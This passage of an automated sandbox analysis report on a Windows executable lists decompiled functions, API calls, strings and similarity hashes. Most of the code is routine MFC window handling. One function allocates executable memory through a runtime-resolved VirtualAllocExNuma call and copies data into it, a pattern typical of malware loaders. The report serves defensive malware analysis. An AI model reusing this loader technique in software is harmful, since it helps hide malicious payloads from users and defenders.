0x0041bacd
0x0041bad1
0x0041bad7
0x0041bae3
0x0041bae3
0x0041bad7
0x0041bae8
0x0041bafd
0x0041bb03
0x0041baea
0x0041baea
0x0041baea
0x0041bb19
0x0041bb1b
0x0041bb20
0x0041bb20
0x0041bb26
0x0041bb2d
0x0041bb2d
0x0041bb38
0x0041bb43
0x0041bb43
0x0041ba95
0x0041ba9d
0x00000000
0x0041ba9f
0x0041ba9f
0x00000000
0x0041ba9f

APIs

Part of subcall function 0041BBD7: GetParent.USER32(?), ref: 0041BC0A
Part of subcall function 0041BBD7: GetLastActivePopup.USER32(?), ref: 0041BC19
Part of subcall function 0041BBD7: IsWindowEnabled.USER32(?), ref: 0041BC2E
Part of subcall function 0041BBD7: EnableWindow.USER32(?,00000000), ref: 0041BC41

SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041BA95
GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0041BB03
MessageBoxA.USER32 ref: 0041BB11
EnableWindow.USER32(00000000,00000001), ref: 0041BB2D

Strings

]hA, xrefs: 0041BA5F

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID: ]hA
API String ID: 1958756768-937096280
Opcode ID: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction ID: 4165363e149cbbf7c392989b56a322b27346b80c9b900e92cfd844e3d8e78dc3
Opcode Fuzzy Hash: 7e6bfb6863a4bed41eb605bf4d3f71dc2d46af30f455a0b67583cfc665ecc676
Instruction Fuzzy Hash: E1217E72A00208AFDB209FA5CCC1BEEB7B9EF44784F54046AE654E7250D7799D81CBE4

Uniqueness

Uniqueness Score: -1.00%

Function 004219DB, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004219DB(intOrPtr* __ecx, int _a4, signed int _a8, intOrPtr _a12) {
				void* __ebp;
				void* _t29;
				int _t30;
				void* _t35;
				void* _t38;
				intOrPtr* _t40;
				int _t42;
				intOrPtr* _t45;
				void* _t46;

				_t45 = __ecx;
				_t29 = E00414DCC(__ecx);
				_t40 =  *((intOrPtr*)(_t45 + 0x68));
				_t42 = _a4;
				_t38 = _t29;
				if(_t40 == 0) {
					L2:
					if(_a8 != 0xffff) {
						if(_t42 == 0 || (_a8 & 0x00000810) != 0) {
							 *(_t45 + 0x90) =  *(_t45 + 0x90) & 0x00000000;
							goto L17;
						} else {
							if(_t42 < 0xf000 || _t42 >= 0xf1f0) {
								if(_t42 < 0xff00) {
									goto L13;
								}
								 *(_t45 + 0x90) = 0xef1f;
								goto L17;
							} else {
								_t42 = (_t42 + 0xffff1000 >> 4) + 0xef00;
								L13:
								 *(_t45 + 0x90) = _t42;
								L17:
								 *(_t38 + 0x24) =  *(_t38 + 0x24) | 0x00000040;
								L18:
								_t30 =  *(_t45 + 0x90);
								if(_t30 ==  *((intOrPtr*)(_t45 + 0x94))) {
									L21:
									return _t30;
								}
								_t30 = E00413740(_t46, GetParent( *(_t45 + 0x1c)));
								if(_t30 == 0) {
									goto L21;
								}
								return PostMessageA( *(_t45 + 0x1c), 0x36a, 0, 0);
							}
						}
					}
					 *(_t45 + 0x24) =  *(_t45 + 0x24) & 0xffffffbf;
					if( *((intOrPtr*)(_t38 + 0x50)) != 0) {
						 *(_t45 + 0x90) = 0xe002;
					} else {
						 *(_t45 + 0x90) = 0xe001;
					}
					SendMessageA( *(_t45 + 0x1c), 0x362,  *(_t45 + 0x90), 0);
					_t35 =  *((intOrPtr*)( *_t45 + 0xd4))();
					if(_t35 != 0) {
						UpdateWindow( *(_t35 + 0x1c));
					}
					goto L18;
				}
				_t30 =  *((intOrPtr*)( *_t40 + 0x7c))(_t42, _a8, _a12);
				if(_t30 != 0) {
					goto L21;
				}
				goto L2;
			}

0x004219e1
0x004219e3
0x004219e8
0x004219eb
0x004219f0
0x004219f2
0x00421a08
0x00421a0f
0x00421a62
0x00421aa7
0x00000000
0x00421a6c
0x00421a72
0x00421a99
0x00000000
0x00000000
0x00421a9b
0x00000000
0x00421a7c
0x00421a85
0x00421a8b
0x00421a8b
0x00421aae
0x00421aae
0x00421ab2
0x00421ab2
0x00421abe
0x00421ae9
0x00421ae9
0x00421ae9
0x00421aca
0x00421ad1
0x00000000
0x00000000
0x00000000
0x00421adf
0x00421a72
0x00421a62
0x00421a11
0x00421a19
0x00421a27
0x00421a1b
0x00421a1b
0x00421a1b
0x00421a41
0x00421a4b
0x00421a53
0x00421a58
0x00421a58
0x00000000
0x00421a53
0x004219fd
0x00421a02
0x00000000
0x00000000
0x00000000

APIs

SendMessageA.USER32(?,00000362,0000E002,00000000), ref: 00421A41
UpdateWindow.USER32(?), ref: 00421A58
GetParent.USER32(?), ref: 00421AC3
PostMessageA.USER32 ref: 00421ADF

Strings

@, xrefs: 00421AAE

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Message$ParentPostSendUpdateWindow
String ID: @
API String ID: 4141989945-2766056989
Opcode ID: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction ID: c85c597f5e24639da506447a35e2af01adcbf593c53045394c0a427bdb2bd247
Opcode Fuzzy Hash: a0883a40ade9d29dabb6438a6d982ec9dd02bf4ebcc6b520c58bc80ef48f8266
Instruction Fuzzy Hash: 6931B131702711AFDB304F60E848B6B77B5BF60315F51493FE55A562B1C779A881DB08

Uniqueness

Uniqueness Score: -1.00%

Function 00414364, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414364(int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t25;
				void* _t34;
				intOrPtr _t37;
				struct HINSTANCE__* _t40;
				CHAR* _t42;

				_t42 = E004249C4() + 0x58;
				_t25 = E00424BFB();
				_t37 = _a8;
				_t40 =  *(_t25 + 8);
				if(_t37 != 0 || _a12 != _t37 || _a16 != _t37) {
					wsprintfA(_t42, "Afx:%x:%x:%x:%x:%x", _t40, _a4, _t37, _a12, _a16);
				} else {
					wsprintfA(_t42, "Afx:%x:%x", _t40, _a4);
				}
				if(GetClassInfoA(_t40, _t42,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t40;
					_v44.hCursor = _t37;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t42;
					_t34 = E004142C3();
					_t50 = _t34;
					if(_t34 == 0) {
						E0041A6C8(_t50);
					}
				}
				return _t42;
			}

0x00414374
0x00414377
0x0041437c
0x0041437f
0x00414384
0x004143b6
0x00414390
0x0041439a
0x004143a0
0x004143cd
0x004143d5
0x004143dd
0x004143e2
0x004143e5
0x004143e8
0x004143eb
0x004143f4
0x004143f5
0x004143f8
0x004143fb
0x004143fe
0x00414401
0x00414406
0x00414408
0x0041440a
0x0041440a
0x00414408
0x00414415

APIs

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394
Afx:%x:%x:%x:%x:%x, xrefs: 004143B0

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: wsprintf$ClassInfo
String ID: Afx:%x:%x$Afx:%x:%x:%x:%x:%x
API String ID: 845911565-79760390
Opcode ID: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction ID: 0a19c2bbf351d913602cecefe87ed30b20bbc7f16e3ca44516e66fb3e2e9fa80
Opcode Fuzzy Hash: e4d80fe6cbb09f3bee196ac69818de1da45527346801286afda017feaf06373e
Instruction Fuzzy Hash: B3214271A0021DAF8F11EF95DC809DF7BB8EF48354B54402BF914E3251D3749A91CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411BB7, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411BB7(void* __ecx, void* __eflags, struct HWND__** _a4) {
				void* _t10;
				void* _t11;
				struct HWND__* _t13;
				struct HWND__* _t16;
				struct HWND__** _t23;
				void* _t24;

				_t23 = _a4;
				_t24 = __ecx;
				if(E00414007(__ecx, _t23) != 0) {
					L12:
					_t10 = 1;
					return _t10;
				}
				_t11 = E00414DCC(__ecx);
				if(_t11 == 0 ||  *((intOrPtr*)(_t11 + 0x50)) == 0) {
					if(_t23[1] != 0x100) {
						L13:
						return E00415EEB(_t23);
					}
					_t13 = _t23[2];
					if(_t13 == 0x1b || _t13 == 3) {
						if((GetWindowLongA( *_t23, 0xfffffff0) & 0x00000004) == 0 || E0041A7A3( *_t23, ?str?) == 0) {
							goto L13;
						} else {
							_t16 = GetDlgItem( *(_t24 + 0x1c), 2);
							if(_t16 == 0 || IsWindowEnabled(_t16) != 0) {
								SendMessageA( *(_t24 + 0x1c), 0x111, 2, 0);
								goto L12;
							} else {
								goto L13;
							}
						}
					} else {
						goto L13;
					}
				} else {
					return 0;
				}
			}

0x00411bb9
0x00411bbd
0x00411bc7
0x00411c3e
0x00411c40
0x00000000
0x00411c40
0x00411bcb
0x00411bd2
0x00411be5
0x00411c43
0x00000000
0x00411c46
0x00411be7
0x00411bed
0x00411c00
0x00000000
0x00411c12
0x00411c17
0x00411c1f
0x00411c38
0x00000000
0x00000000
0x00000000
0x00000000
0x00411c1f
0x00000000
0x00000000
0x00000000
0x00411bda
0x00000000
0x00411bda

APIs

GetWindowLongA.USER32 ref: 00411BF8
GetDlgItem.USER32 ref: 00411C17
IsWindowEnabled.USER32(00000000), ref: 00411C22
SendMessageA.USER32(?,00000111,00000002,00000000), ref: 00411C38

Strings

Edit, xrefs: 00411C02

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction ID: 51c9d298f70c0f27378d29b3ac4567bc27d580c5dbc93a390a738e7f39d54beb
Opcode Fuzzy Hash: d2bf7d8cbc67d805becf9f5c6b39b18b476eb93c12fd4936ba7e19a4eada64a8
Instruction Fuzzy Hash: F701A1303486116AEA341B26DD09BEBA764DB80755F14442BF601D56F4EB68D9C2869C

Uniqueness

Uniqueness Score: -1.00%

Function 004012BE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004012BE(intOrPtr _a4, intOrPtr _a8) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _v12;
				struct HINSTANCE__** _t11;

				_v12 = 0;
				_v8 = 0;
				_t11 =  &_v8;
				_push(_t11);
				_push("kernel32.dll");
				_push(0);
				L0040C36A();
				if(_t11 != 0) {
					 *0x437ca8 = GetProcAddress(_v8, "VirtualAllocExNuma");
					_v12 =  *0x437ca8(GetCurrentProcess(), 0, _a8, 0x3000, 0x40, 0);
					E00405700(_v12, _a4, _a8);
				}
				return _v12;
			}

0x004012c4
0x004012cb
0x004012d2
0x004012d5
0x004012d6
0x004012db
0x004012dd
0x004012e4
0x004012f5
0x00401316
0x00401325
0x0040132a
0x00401333

APIs

GetModuleHandleExA.KERNEL32(00000000,kernel32.dll,00000000), ref: 004012DD
GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 004012EF
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,00000000), ref: 00401309

Strings

kernel32.dll, xrefs: 004012D6
VirtualAllocExNuma, xrefs: 004012E6

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressCurrentHandleModuleProcProcess
String ID: VirtualAllocExNuma$kernel32.dll
API String ID: 4190356694-3151700105
Opcode ID: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction ID: ab771110a78a71b3a50b1cedd4e9fcdb71e2ffac9dc1a6c26221fcdacf48f8c9
Opcode Fuzzy Hash: 4d1cfc9253b6b5733faca174fa102fb281a72f41be6bcaf77d063d5ced50d19a
Instruction Fuzzy Hash: C90136B5A40308BFDB10DFE4DC45F9E7BB8EB48715F509165FA04A72C0D7749A409BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041A2AB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A2AB(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t9;
				void* _t10;

				_t10 = __ecx;
				_t4 = GetModuleHandleA("GDI32.DLL");
				_t9 = 0;
				_t5 = GetProcAddress(_t4, "SetLayout");
				if(_t5 == 0) {
					if(_a4 != 0) {
						_t9 = 0xffffffff;
						SetLastError(0x78);
					}
				} else {
					_t9 =  *_t5( *((intOrPtr*)(_t10 + 4)), _a4);
				}
				return _t9;
			}

0x0041a2ad
0x0041a2b4
0x0041a2c0
0x0041a2c2
0x0041a2ca
0x0041a2dd
0x0041a2e1
0x0041a2e4
0x0041a2e4
0x0041a2cc
0x0041a2d5
0x0041a2d5
0x0041a2ee

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,0041F6C9,00000000), ref: 0041A2B4
GetProcAddress.KERNEL32(00000000,SetLayout), ref: 0041A2C2
SetLastError.KERNEL32(00000078,?,?,0041F6C9,00000000), ref: 0041A2E4

Strings

SetLayout, xrefs: 0041A2BA
GDI32.DLL, xrefs: 0041A2AF

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$SetLayout
API String ID: 4275029093-2147214759
Opcode ID: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction ID: 1037135d2ca6d5ab5d4448aeed59ef973abf2fe16e9a43a6574f43dcbb056aca
Opcode Fuzzy Hash: d183b8fac5a71e79e7e75f7f8f27896d7713d41af84b50f8206dd60643ccb5a3
Instruction Fuzzy Hash: D1E0D832701210FB82215719AC0895FBB52DBD4736BA98567F529C1290C7B9489286AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A275, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041A275(signed int __ecx) {
				_Unknown_base(*)()* _t3;
				signed int _t7;
				signed int _t8;

				_t7 = __ecx;
				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
				if(_t3 == 0) {
					_t8 = _t7 | 0xffffffff;
					SetLastError(0x78);
				} else {
					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
				}
				return _t8;
			}

0x0041a276
0x0041a289
0x0041a291
0x0041a29e
0x0041a2a1
0x0041a293
0x0041a298
0x0041a298
0x0041a2aa

APIs

GetModuleHandleA.KERNEL32(GDI32.DLL,?,0041F6BC), ref: 0041A27D
GetProcAddress.KERNEL32(00000000,GetLayout), ref: 0041A289
SetLastError.KERNEL32(00000078), ref: 0041A2A1

Strings

GetLayout, xrefs: 0041A283
GDI32.DLL, xrefs: 0041A278

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: GDI32.DLL$GetLayout
API String ID: 4275029093-2396518106
Opcode ID: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction ID: 1954eb6f5355677032b0495d8726e370a05d23e30929425976ce774bf1de63f4
Opcode Fuzzy Hash: 9c85741f7edf57603d2f5ee7905b819242f56eff0a883d68a4b20df1af663ec8
Instruction Fuzzy Hash: 38D05B31B42330EFC66027A4BD0D69A7B54DB08B6579502B7782ED22D0CBF85C4187ED

Uniqueness

Uniqueness Score: -1.00%

Function 0041F691, Relevance: 7.8, APIs: 5, Instructions: 339
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041F691(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				long _v28;
				struct tagRECT _v44;
				struct tagRECT _v60;
				intOrPtr _t150;
				intOrPtr* _t155;
				intOrPtr _t161;
				void* _t162;
				signed int _t165;
				signed int _t167;
				signed int _t171;
				signed int _t173;
				long _t191;
				intOrPtr* _t198;
				intOrPtr* _t200;
				long _t202;
				intOrPtr* _t209;
				intOrPtr* _t211;
				intOrPtr* _t214;
				long _t216;
				void* _t219;
				signed char _t222;
				intOrPtr _t225;
				intOrPtr _t236;
				intOrPtr _t242;
				char* _t248;
				struct tagRECT* _t263;
				intOrPtr* _t279;
				signed int _t281;
				long _t283;
				void* _t287;
				intOrPtr _t291;
				intOrPtr _t308;

				_t219 = __ecx;
				 *((intOrPtr*)(__ecx + 0x88)) = 1;
				E0041FF70(__ecx);
				_t279 = __ecx + 0x84;
				if((E0041A275( *((intOrPtr*)(__ecx + 0x84))) & 0x00000001) != 0) {
					E0041A2AB( *_t279, 0);
				}
				_t150 =  *((intOrPtr*)(_t219 + 0x68));
				_t222 =  *(_t150 + 0x64);
				if((_t222 & 0x00000004) == 0) {
					if((_t222 & 0x00000002) == 0) {
						GetWindowRect( *(_t150 + 0x1c),  &_v44);
						_t281 =  *(_t219 + 0x78) & 0x0000a000;
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						asm("sbb edx, edx");
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t248 =  &_v20;
						_t155 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))(_t248, 0xffffffff, ( ~_t281 & 0x00000006) + 0xa);
						_t225 =  *_t155;
						_v8 =  *((intOrPtr*)(_t155 + 4));
						if(_t281 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t283 = _v44.left;
							asm("cdq");
							_v20 = _t225 + _t283;
							_v28 = _t283;
							_t250 = _v44.right - _t283 - _t248 >> 1;
							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
							_v24 = _t161;
							_v16 = _v8 + _t161;
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t291 = _v44.top;
							_v24 = _t291;
							asm("cdq");
							_t250 = _v44.bottom - _t291 - _t248 >> 1;
							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
							_v28 = _t191;
							_v20 = _t225 + _t191;
							_v16 = _v8 + _t291;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t162 = _t219 + 0x48;
						_push(0);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t287 = 0xc40000;
						_push(0xc40000);
					} else {
						GetWindowRect( *(_t150 + 0x1c),  &_v60);
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
						_t236 = _v60.top;
						_v44.top = _t236;
						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
						_v16 =  *((intOrPtr*)(_t200 + 4));
						_t202 = _v60.left;
						_v44.right =  *_t198 + _t202;
						_v44.left = _t202;
						_t250 =  *_t200 + _t202;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v44.left = _t202;
						_v44.right =  *_t200 + _t202;
						_v44.top = _t236;
						_v44.bottom = _v16 + _t236;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						goto L6;
					}
				} else {
					GetWindowRect( *(_t150 + 0x1c),  &_v60);
					 *((intOrPtr*)(_t219 + 4)) = _a4;
					 *((intOrPtr*)(_t219 + 8)) = _a8;
					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
					_v12 =  *_t211;
					_v8 =  *((intOrPtr*)(_t211 + 4));
					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
					_t242 = _v60.top;
					_v44.top = _t242;
					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
					_v16 =  *((intOrPtr*)(_t214 + 4));
					_t216 = _v60.left;
					_v44.right =  *_t209 + _t216;
					_v44.left = _t216;
					_t250 =  *_t214 + _t216;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _v12 + _t216;
					_v44.top = _t242;
					_v44.bottom = _v8 + _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t308 = _v16 + _t242;
					_v44.left = _t216;
					_v8 = _t308;
					_v44.bottom = _t308;
					_v44.right = _t250;
					_v44.top = _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _t250;
					_v44.top = _t242;
					_v44.bottom = _v8;
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t287 = 0xc40000;
					_push(0);
					_push(0xc40000);
					_t162 = _t219 + 0x48;
				}
				_push(_t162);
				E004239AC();
				_push(0);
				_t263 = _t219 + 0x58;
				_push(_t287);
				_push(_t263);
				E004239AC();
				_t165 =  *0x439bf4; // 0x2
				_t167 =  *0x439bf0; // 0x2
				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
				_t171 =  *0x439bf4; // 0x2
				_t173 =  *0x439bf0; // 0x2
				InflateRect(_t263,  ~_t173,  ~_t171);
				_t264 = _a8;
				_t289 = _a4;
				E0041F5D0(_t219 + 0x28, _a4, _a8);
				E0041F5D0(_t219 + 0x38, _a4, _a8);
				E0041F5D0(_t219 + 0x48, _t289, _t264);
				E0041F5D0(_t219 + 0x58, _t289, _t264);
				 *((intOrPtr*)(_t219 + 0x74)) = E004201E2();
				E0041F9E4(_t219, _t289, _t264);
				return E00420341(_t219, _t250);
			}

0x0041f698
0x0041f69c
0x0041f6a6
0x0041f6b1
0x0041f6be
0x0041f6c4
0x0041f6c4
0x0041f6c9
0x0041f6cc
0x0041f6d2
0x0041f7bf
0x0041f879
0x0041f885
0x0041f890
0x0041f898
0x0041f89a
0x0041f8a6
0x0041f8ac
0x0041f8b2
0x0041f8b9
0x0041f8bc
0x0041f8fd
0x0041f8fe
0x0041f902
0x0041f903
0x0041f904
0x0041f90e
0x0041f911
0x0041f91c
0x0041f91f
0x0041f921
0x0041f928
0x0041f92b
0x0041f8be
0x0041f8c4
0x0041f8c5
0x0041f8c9
0x0041f8ca
0x0041f8cb
0x0041f8d3
0x0041f8d6
0x0041f8de
0x0041f8e0
0x0041f8e2
0x0041f8ea
0x0041f8f2
0x0041f8f2
0x0041f92e
0x0041f92f
0x0041f930
0x0041f931
0x0041f932
0x0041f93a
0x0041f93c
0x0041f93d
0x0041f93e
0x0041f93f
0x0041f946
0x0041f947
0x0041f948
0x0041f949
0x0041f94a
0x0041f94f
0x0041f7c5
0x0041f7cc
0x0041f7d8
0x0041f7de
0x0041f7eb
0x0041f803
0x0041f80b
0x0041f810
0x0041f816
0x0041f819
0x0041f81c
0x0041f824
0x0041f82a
0x0041f82d
0x0041f82f
0x0041f830
0x0041f831
0x0041f832
0x0041f839
0x0041f83a
0x0041f83b
0x0041f83c
0x0041f83d
0x0041f84b
0x0041f84e
0x0041f851
0x0041f854
0x0041f855
0x0041f856
0x0041f857
0x00000000
0x0041f85b
0x0041f6d8
0x0041f6df
0x0041f6eb
0x0041f6f1
0x0041f6fe
0x0041f716
0x0041f720
0x0041f72c
0x0041f734
0x0041f73c
0x0041f741
0x0041f747
0x0041f74a
0x0041f74d
0x0041f755
0x0041f75b
0x0041f75e
0x0041f760
0x0041f761
0x0041f762
0x0041f763
0x0041f76c
0x0041f76f
0x0041f777
0x0041f77a
0x0041f780
0x0041f781
0x0041f782
0x0041f783
0x0041f78a
0x0041f78c
0x0041f78f
0x0041f792
0x0041f798
0x0041f79b
0x0041f79e
0x0041f79f
0x0041f7a0
0x0041f7a1
0x0041f7a2
0x0041f7a8
0x0041f7ab
0x0041f7ae
0x0041f85e
0x0041f85e
0x0041f85f
0x0041f860
0x0041f861
0x0041f862
0x0041f867
0x0041f869
0x0041f86a
0x0041f86a
0x0041f950
0x0041f951
0x0041f956
0x0041f958
0x0041f95b
0x0041f95c
0x0041f95d
0x0041f962
0x0041f970
0x0041f97c
0x0041f97e
0x0041f986
0x0041f98f
0x0041f991
0x0041f994
0x0041f99d
0x0041f9a8
0x0041f9b3
0x0041f9be
0x0041f9ce
0x0041f9d1
0x0041f9e1

APIs

Part of subcall function 0041FF70: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0041FF8D
Part of subcall function 0041FF70: GetMessageA.USER32 ref: 0041FF9B
